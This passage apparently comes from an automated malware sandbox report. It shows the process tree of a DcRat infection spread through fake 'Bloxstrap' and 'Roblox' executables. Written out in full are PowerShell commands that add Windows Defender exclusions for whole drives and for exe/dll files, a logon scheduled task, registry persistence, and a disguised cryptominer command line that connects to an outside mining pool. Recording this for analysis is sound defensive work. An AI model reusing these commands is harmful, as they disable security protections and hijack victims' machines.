                                                          "powershell" -Command Add-MpPreference -ExclusionPath 'C:\winNet\csrss.exe'
                                                          8⤵
                                                          • Command and Scripting Interpreter: PowerShell
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:2200
                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\unsecapp.exe'
                                                          8⤵
                                                          • Command and Scripting Interpreter: PowerShell
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:2276
                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\SystemTemp\Crashpad\reports\msiexec.exe'
                                                          8⤵
                                                          • Command and Scripting Interpreter: PowerShell
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:5004
                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          "powershell" -Command Add-MpPreference -ExclusionPath 'C:\winNet\dllhost.exe'
                                                          8⤵
                                                          • Command and Scripting Interpreter: PowerShell
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:420
                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          "powershell" -Command Add-MpPreference -ExclusionPath 'C:\winNet\msiexec.exe'
                                                          8⤵
                                                          • Command and Scripting Interpreter: PowerShell
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:3912
                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Uninstall Information\dwm.exe'
                                                          8⤵
                                                          • Command and Scripting Interpreter: PowerShell
                                                          PID:1540
                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\fontdrvhost.exe'
                                                          8⤵
                                                          • Command and Scripting Interpreter: PowerShell
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:2352
                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Common Files\Java\Java Update\wscript.exe'
                                                          8⤵
                                                          • Command and Scripting Interpreter: PowerShell
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:2776
                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          "powershell" -Command Add-MpPreference -ExclusionPath 'C:\winNet\RuntimeBroker.exe'
                                                          8⤵
                                                          • Command and Scripting Interpreter: PowerShell
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:440
                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          "powershell" -Command Add-MpPreference -ExclusionPath 'C:\DriversavessessionDlldhcp\SearchHost.exe'
                                                          8⤵
                                                          • Command and Scripting Interpreter: PowerShell
                                                          PID:3808
                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Bloxstrap.exe'
                                                          8⤵
                                                          • Command and Scripting Interpreter: PowerShell
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:4812
                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          "powershell" -Command Add-MpPreference -ExclusionPath 'C:\winNet\sihost.exe'
                                                          8⤵
                                                          • Command and Scripting Interpreter: PowerShell
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:956
                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Google\Update\Offline\Idle.exe'
                                                          8⤵
                                                          • Command and Scripting Interpreter: PowerShell
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:4592
                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Videos\OfficeClickToRun.exe'
                                                          8⤵
                                                          • Command and Scripting Interpreter: PowerShell
                                                          PID:4064
                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\AppData\Roaming\Microsoft\csrss.exe'
                                                          8⤵
                                                          • Command and Scripting Interpreter: PowerShell
                                                          PID:2112
                                                        • C:\Windows\System32\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\GI7AJm8Pkj.bat"
                                                          8⤵
                                                            PID:5548
                                                            • C:\Windows\system32\w32tm.exe
                                                              w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                              9⤵
                                                                PID:5652
                                                              • C:\DriversavessessionDlldhcp\SearchHost.exe
                                                                "C:\DriversavessessionDlldhcp\SearchHost.exe"
                                                                9⤵
                                                                • Executes dropped EXE
                                                                PID:1476
                                                • C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe"
                                                  2⤵
                                                  • DcRat
                                                  • Executes dropped EXE
                                                  • Modifies registry class
                                                  • Suspicious use of WriteProcessMemory
                                                  PID:2344
                                                  • C:\Windows\SysWOW64\WScript.exe
                                                    "C:\Windows\System32\WScript.exe" "C:\winNet\we9fgyC144zVOkGk.vbe"
                                                    3⤵
                                                      PID:2720
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c ""C:\winNet\rsH0xIUsPk2E2Mq2a4QwbDGWD6K8lz.bat" "
                                                        4⤵
                                                          PID:5424
                                                          • C:\winNet\ComContainerbrowserRefRuntime.exe
                                                            "C:\winNet/ComContainerbrowserRefRuntime.exe"
                                                            5⤵
                                                            • Executes dropped EXE
                                                            • Modifies registry class
                                                            PID:3112
                                                            • C:\Windows\System32\cmd.exe
                                                              "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\zxhe5InkWx.bat"
                                                              6⤵
                                                                PID:1120
                                                                • C:\Windows\system32\chcp.com
                                                                  chcp 65001
                                                                  7⤵
                                                                    PID:2892
                                                                  • C:\Windows\system32\w32tm.exe
                                                                    w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                    7⤵
                                                                      PID:5564
                                                                    • C:\winNet\ComContainerbrowserRefRuntime.exe
                                                                      "C:\winNet\ComContainerbrowserRefRuntime.exe"
                                                                      7⤵
                                                                      • Executes dropped EXE
                                                                      PID:6128
                                                          • C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe"
                                                            2⤵
                                                            • Executes dropped EXE
                                                            PID:1444
                                                            • C:\Windows\System32\conhost.exe
                                                              "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe"
                                                              3⤵
                                                                PID:6024
                                                                • C:\Windows\System32\cmd.exe
                                                                  "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
                                                                  4⤵
                                                                    PID:6120
                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
                                                                      5⤵
                                                                      • Command and Scripting Interpreter: PowerShell
                                                                      PID:5328
                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
                                                                      5⤵
                                                                      • Command and Scripting Interpreter: PowerShell
                                                                      PID:5392
                                                                  • C:\Windows\System32\cmd.exe
                                                                    "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "Bloxstrap" /tr "C:\Users\Admin\Bloxstrap.exe"
                                                                    4⤵
                                                                      PID:2080
                                                                      • C:\Windows\system32\schtasks.exe
                                                                        schtasks /create /f /sc onlogon /rl highest /tn "Bloxstrap" /tr "C:\Users\Admin\Bloxstrap.exe"
                                                                        5⤵
                                                                        • DcRat
                                                                        • Scheduled Task/Job: Scheduled Task
                                                                        PID:392
                                                                    • C:\Windows\System32\cmd.exe
                                                                      "cmd" cmd /c "C:\Users\Admin\Bloxstrap.exe"
                                                                      4⤵
                                                                        PID:1304
                                                                        • C:\Users\Admin\Bloxstrap.exe
                                                                          C:\Users\Admin\Bloxstrap.exe
                                                                          5⤵
                                                                          • Executes dropped EXE
                                                                          PID:1016
                                                                          • C:\Windows\System32\conhost.exe
                                                                            "C:\Windows\System32\conhost.exe" "C:\Users\Admin\Bloxstrap.exe"
                                                                            6⤵
                                                                            • Suspicious use of SetThreadContext
                                                                            PID:5004
                                                                            • C:\Windows\System32\cmd.exe
                                                                              "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
                                                                              7⤵
                                                                                PID:4092
                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
                                                                                  8⤵
                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                  PID:3892
                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
                                                                                  8⤵
                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                  PID:5720
                                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                                "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                                                7⤵
                                                                                • Executes dropped EXE
                                                                                PID:5132
                                                                                • C:\Windows\System32\conhost.exe
                                                                                  "C:\Windows\System32\conhost.exe" "/sihost64"
                                                                                  8⤵
                                                                                    PID:1972
                                                                                • C:\Windows\explorer.exe
                                                                                  C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=43a4sKqYaYRDJ11nnS8kk6ATe7pwz7GqaGCjueKKVcqS8V7ZgQduYQSENk7PRNr1FjgxF7TADqsRBjA5cMsYJeovSPcRAnK --pass=x --cpu-max-threads-hint=30 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=2 --cinit-idle-cpu=90 --tls --cinit-stealth
                                                                                  7⤵
                                                                                    PID:5712
                                                                        • C:\Users\Admin\AppData\Local\Temp\Frage build.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\Frage build.exe"
                                                                          2⤵
                                                                          • Executes dropped EXE
                                                                          • Modifies registry class
                                                                          • Suspicious use of WriteProcessMemory
                                                                          PID:4904
                                                                          • C:\Windows\SysWOW64\WScript.exe
                                                                            "C:\Windows\System32\WScript.exe" "C:\DriversavessessionDlldhcp\ghJPtatrYDLygnNWh9dEZv.vbe"
                                                                            3⤵
                                                                              PID:5060
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /c ""C:\DriversavessessionDlldhcp\exFbRiwQoowToPhSTKSA9iYE.bat" "
                                                                                4⤵
                                                                                  PID:3908
                                                                                  • C:\DriversavessessionDlldhcp\Roblox.exe
                                                                                    "C:\DriversavessessionDlldhcp/Roblox.exe"
                                                                                    5⤵
                                                                                    • Modifies WinLogon for persistence
                                                                                    • Executes dropped EXE
                                                                                    • Adds Run key to start application
                                                                                    • Modifies registry class
                                                                                    PID:5836
                                                                                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\loheq4ac\loheq4ac.cmdline"
                                                                                      6⤵
                                                                                        PID:1176
                                                                                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3757.tmp" "c:\Users\Default User\CSC3FE150F924B4925B9D2092F72F386E.TMP"
                                                                                          7⤵
                                                                                            PID:4776
                                                                                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4gy3050f\4gy3050f.cmdline"
                                                                                          6⤵
                                                                                            PID:276
                                                                                            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES37D4.tmp" "c:\winNet\CSC3819460273F4426F84D8BB51F11D638.TMP"
                                                                                              7⤵
                                                                                                PID:5952
                                                                                            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\df25lzqd\df25lzqd.cmdline"
                                                                                              6⤵
                                                                                                PID:2820
                                                                                                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3832.tmp" "c:\Program Files\Uninstall Information\CSC880CA798E664626A5A38DB655CC4F.TMP"
                                                                                                  7⤵
                                                                                                    PID:2112
                                                                                                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\byxgeu4u\byxgeu4u.cmdline"
                                                                                                  6⤵
                                                                                                    PID:4748
                                                                                                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES388F.tmp" "c:\Program Files (x86)\Windows Photo Viewer\en-US\CSCF15A0D27F8EA4CDFBC1DE8BF698648A.TMP"
                                                                                                      7⤵
                                                                                                        PID:4756
                                                                                                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\1z35jtl5\1z35jtl5.cmdline"
                                                                                                      6⤵
                                                                                                      • Drops file in Windows directory
                                                                                                      PID:1716
                                                                                                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES38FD.tmp" "c:\Windows\PrintDialog\Assets\CSCEA7B6E856AE41B3B5E0A1592D23E056.TMP"
                                                                                                        7⤵
                                                                                                          PID:5864
                                                                                                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nfrvli0k\nfrvli0k.cmdline"
                                                                                                        6⤵
                                                                                                          PID:5288
                                                                                                          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES396A.tmp" "c:\Users\Default\My Documents\CSC1EEA76721C33491DBF5A770652E75AA.TMP"
                                                                                                            7⤵
                                                                                                              PID:5512
                                                                                                          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\s0pk5drk\s0pk5drk.cmdline"
                                                                                                            6⤵
                                                                                                              PID:5516
                                                                                                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES39C8.tmp" "c:\Users\Default\AppData\Roaming\Microsoft\CSC7EBEBB9C69F644668F96E96FCAD24F.TMP"
                                                                                                                7⤵
                                                                                                                  PID:3464
                                                                                                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hzyziqsh\hzyziqsh.cmdline"
                                                                                                                6⤵
                                                                                                                  PID:5956
                                                                                                                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3A35.tmp" "c:\Recovery\WindowsRE\CSCBC55AF23D3ED47C1B0F23D506375AC11.TMP"
                                                                                                                    7⤵
                                                                                                                      PID:5852
                                                                                                                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\13sxzenz\13sxzenz.cmdline"
                                                                                                                    6⤵
                                                                                                                      PID:2912
                                                                                                                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3A83.tmp" "c:\winNet\CSCCDABDA6FBD3144BFAE6242C5FF4F7337.TMP"
                                                                                                                        7⤵
                                                                                                                          PID:676
                                                                                                                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\brg4sgws\brg4sgws.cmdline"
                                                                                                                        6⤵
                                                                                                                          PID:3156
                                                                                                                          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3AE1.tmp" "c:\winNet\CSC4209010B7DB2458FA1F87AC12D82E0D1.TMP"
                                                                                                                            7⤵
                                                                                                                              PID:6088
                                                                                                                          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0oqq3fey\0oqq3fey.cmdline"
                                                                                                                            6⤵
                                                                                                                              PID:5848
                                                                                                                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3B4F.tmp" "c:\Recovery\WindowsRE\CSC339F169BAEB64F12B23412325710F2F1.TMP"
                                                                                                                                7⤵
                                                                                                                                  PID:5480
                                                                                                                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vmnhnhd4\vmnhnhd4.cmdline"
                                                                                                                                6⤵
                                                                                                                                  PID:5800
                                                                                                                                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3BCC.tmp" "c:\Program Files (x86)\Common Files\Java\Java Update\CSC5D76553A79294C23A2CD2DC6C0B98735.TMP"
                                                                                                                                    7⤵
                                                                                                                                      PID:5000
                                                                                                                                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2ldcdws2\2ldcdws2.cmdline"
                                                                                                                                    6⤵
                                                                                                                                      PID:5404
                                                                                                                                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3C29.tmp" "c:\DriversavessessionDlldhcp\CSC543B41D4C96B47E28D87A8E79CF2EE2.TMP"
                                                                                                                                        7⤵
                                                                                                                                          PID:1768
                                                                                                                                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\532r2fs2\532r2fs2.cmdline"
                                                                                                                                        6⤵
                                                                                                                                          PID:6116
                                                                                                                                          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3C87.tmp" "c:\Users\Admin\CSCBDD51F59FF6D4F6CBF915D8B5E59DB6.TMP"
                                                                                                                                            7⤵
                                                                                                                                              PID:2720
                                                                                                                                          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\d0s2i2p5\d0s2i2p5.cmdline"
                                                                                                                                            6⤵
                                                                                                                                              PID:4388
                                                                                                                                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3CD5.tmp" "c:\winNet\CSC89A986E0123D4AF390BCDC8FD62C0DE.TMP"
                                                                                                                                                7⤵
                                                                                                                                                  PID:4052
                                                                                                                                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\l1m4nhol\l1m4nhol.cmdline"
                                                                                                                                                6⤵
                                                                                                                                                  PID:5064
                                                                                                                                                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3D62.tmp" "c:\Program Files (x86)\Google\Update\Offline\CSC3C5481A9DE4452AA561CB5E82AF685A.TMP"
                                                                                                                                                    7⤵
                                                                                                                                                      PID:5256
                                                                                                                                                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\cboiesuc\cboiesuc.cmdline"
                                                                                                                                                    6⤵
                                                                                                                                                      PID:5652
                                                                                                                                                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3DC0.tmp" "c:\Users\Admin\Videos\CSC1DB3415AF1BA48279B72F2D47F01C5A.TMP"
                                                                                                                                                        7⤵
                                                                                                                                                          PID:1984
                                                                                                                                                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qipd3qcq\qipd3qcq.cmdline"
                                                                                                                                                        6⤵
                                                                                                                                                        • Drops file in System32 directory
                                                                                                                                                        PID:336
                                                                                                                                                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3E0E.tmp" "c:\Windows\System32\CSC1AFE84F5994A4CC7B7794C40D55BC32D.TMP"
                                                                                                                                                          7⤵
                                                                                                                                                            PID:5060
                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                                                                                                                                                          6⤵
                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                          PID:1688
                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                                                                                                                                                          6⤵
                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                          PID:2688
                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Config.Msi/'
                                                                                                                                                          6⤵
                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                          PID:5532
                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                                                                                                                                                          6⤵
                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                          PID:5544
                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          "powershell" -Command Add-MpPreference -ExclusionPath 'C:/DriversavessessionDlldhcp/'
                                                                                                                                                          6⤵
                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                          PID:5528
                                                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                            7⤵
                                                                                                                                                              PID:5952
                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                                                                                                                                                            6⤵
                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                            PID:5380
                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                                                                                                                                                            6⤵
                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                            PID:5684
                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                                                                                                                                                            6⤵
                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                            PID:4796
                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                                                                                                                                                            6⤵
                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                            PID:5640
                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
